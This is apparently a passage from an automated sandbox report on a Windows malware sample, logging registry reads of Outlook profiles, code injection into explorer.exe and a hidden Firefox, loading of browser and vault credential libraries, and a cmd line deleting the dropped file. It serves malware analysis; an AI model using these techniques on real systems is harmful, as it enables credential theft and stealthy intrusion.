Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	2	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-	6	Fn
Enumerate Values	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-	1	Fn

Process (5)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Windows\System32\cmd.exe	os_pid = 0xc80, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Program Files\Mozilla Firefox\Firefox.exe	os_pid = 0xce4, creation_flags = CREATE_SUSPENDED, CREATE_DETACHED_PROCESS, show_window = SW_HIDE	1	Fn
Get Info	c:\windows\explorer.exe	type = PROCESS_BASIC_INFORMATION	1	Fn
Get Info	C:\Program Files\Mozilla Firefox\Firefox.exe	type = PROCESS_BASIC_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn

Thread (7)

Operation	Process	Additional Information	Count	Logfile
Open	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Suspend	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Get Context	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Queue APC	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Set Context	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Resume	c:\windows\explorer.exe	os_tid = 0x614	1	Fn
Resume	c:\windows\system32\cmmon32.exe	os_tid = 0xbd8	1	Fn

Memory (3)

Operation	Process	Additional Information	Count	Logfile
Read	c:\windows\explorer.exe	address = 0x7ffde000, size = 32	1	Fn Data
Read	C:\Program Files\Mozilla Firefox\Firefox.exe	address = 0x7ffd9000, size = 32	1	Fn Data
Read	C:\Program Files\Mozilla Firefox\Firefox.exe	address = 0x1240000, size = 278528	1	Fn Data

Module (20)

Operation	Module	Additional Information	Count	Logfile
Load	ole32.dll	base_address = 0x0	1	Fn
Load	C:\Program Files\Mozilla Firefox\nss3.dll	base_address = 0xc0000135	1	Fn
Load	winsqlite3.dll	base_address = 0xc0000135	1	Fn
Load	vaultcli.dll	base_address = 0x0	1	Fn
Load	gdiplus.dll	base_address = 0x0	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 2418684	1	Fn
Create Mapping	-	protection = PAGE_READWRITE, maximum_size = 2417272	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 2417760	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 2416732	1	Fn
Create Mapping	-	protection = PAGE_EXECUTE_READWRITE, maximum_size = 2416784	1	Fn
Map	-	process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1c0000	1	Fn
Map	-	process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_READWRITE, address_out = 0x1b00000	1	Fn
Map	-	process_name = c:\windows\explorer.exe, protection = PAGE_READWRITE, address_out = 0x6840000	1	Fn
Map	-	process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x24d0000	1	Fn
Map	-	process_name = c:\windows\explorer.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x63a0000	1	Fn
Map	-	process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_READWRITE, address_out = 0x1f0000	1	Fn
Map	-	process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2aa0000	1	Fn
Map	-	process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xbc0000	1	Fn
Map	-	process_name = c:\windows\system32\cmmon32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x690000	1	Fn
Map	-	process_name = C:\Program Files\Mozilla Firefox\Firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1240000	1	Fn

System (26)

Operation	Additional Information	Count	Logfile
Sleep	duration = 2417792 milliseconds (2417.792 seconds)	1	Fn
Sleep	duration = 2418724 milliseconds (2418.724 seconds)	11	Fn
Sleep	duration = 2418724 milliseconds (2418.724 seconds)	1	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	13	Fn

Mutex (2)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = 664908S9UTEIZ6MN, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE		1	Fn
Create	mutex_name = OLO0NDS-0AXWwKzG, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Set Environment String	name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Mozilla Firefox, environment = 0		1	Fn
Set Environment String	name = PATH, value = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\, environment = 0		1	Fn

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\windows\system32\cmmon32.exe	-		1	Fn

Process #9: cmd.exe

(Host: 52, Network: 0)

Information	Value
ID	#9
File Name	c:\windows\system32\cmd.exe
Command Line	/c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:11, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:01:08

OS Process Information

Information	Value
PID	0xc80
Parent PID	0xbd4 (c:\windows\system32\cmmon32.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C84

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000070000	0x00070000	0x0016ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00270000	0x002d6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002e0000	0x002e0000	0x002e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002f0000	0x002f0000	0x002f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000300000	0x00300000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000310000	0x00310000	0x003d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003e0000	0x003e0000	0x004e0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004f0000	0x004f0000	0x010effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000010f0000	0x010f0000	0x01252fff	Pagefile Backed Memory	Readable	Region Actions
cmd.exe	0x4a2d0000	0x4a31bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x6f1a0000	0x6f1a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Host Behavior

File (14)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe	type = file_attributes	2	Fn
Get Info	C:\Users\BGC6U8~1\AppData\Local\Temp	type = file_attributes	1	Fn
Open	STD_OUTPUT_HANDLE	-	5	Fn
Open	STD_INPUT_HANDLE	-	3	Fn
Delete	C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe	-	1	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 224, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4a2d0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76c10000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x76c624c2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x76c4ac6c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c53ea8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x76c62732	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-12-20 14:27:33 (UTC)		1	Fn
Get Time	type = Ticks, time = 131789		1	Fn

Environment (11)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #11: firefox.exe

(Host: 3, Network: 0)

Information	Value
ID	#11
File Name	c:\program files\mozilla firefox\firefox.exe
Command Line	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:48, Reason: Child Process
Unmonitor	End Time: 00:02:19, Reason: Terminated by Timeout
Monitor Duration	00:00:31

OS Process Information

Information	Value
PID	0xce4
Parent PID	0xbd4 (c:\windows\system32\cmmon32.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f46e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x CE8

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00042fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d3fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x00bb3fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000bc0000	0x00bc0000	0x00cc9fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000cd0000	0x00cd0000	0x00d97fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000da0000	0x00da0000	0x00da6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000db0000	0x00db0000	0x00db1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000dd0000	0x00dd0000	0x00ddffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000df0000	0x00df0000	0x00e2ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000e30000	0x00e30000	0x00f30fff	Pagefile Backed Memory	Readable	Region Actions
ntdll.dll	0x00f40000	0x0107bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000001130000	0x01130000	0x0113ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001140000	0x01140000	0x0123ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001240000	0x01240000	0x01283fff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001290000	0x01290000	0x01e8ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001f00000	0x01f00000	0x01ffffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02000000	0x022cefff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000022d0000	0x022d0000	0x026c2fff	Pagefile Backed Memory	Readable	Region Actions
nss3.dll	0x62940000	0x62af4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x6e510000	0x6e541fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
freebl3.dll	0x6f0f0000	0x6f13efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
softokn3.dll	0x6f1f0000	0x6f216fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nssdbm3.dll	0x71fe0000	0x71ff6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x72000000	0x720bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x720d0000	0x72138fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mozglue.dll	0x72140000	0x72161fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wsock32.dll	0x72170000	0x72176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75110000	0x7511bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x75120000	0x7523cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77090000	0x77095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x770d0000	0x77104fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions

Host Behavior

File (1)

Operation	Filename	Additional Information	Success	Count	Logfile
Create	\??\C:\Windows\SYSTEM32\ntdll.dll	desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE		1	Fn

Module (2)

Operation	Module	Additional Information	Success	Count	Logfile
Create Mapping	-	protection = PAGE_EXECUTE, maximum_size = 0		1	Fn
Map	-	process_name = c:\program files\mozilla firefox\firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0xf40000		1	Fn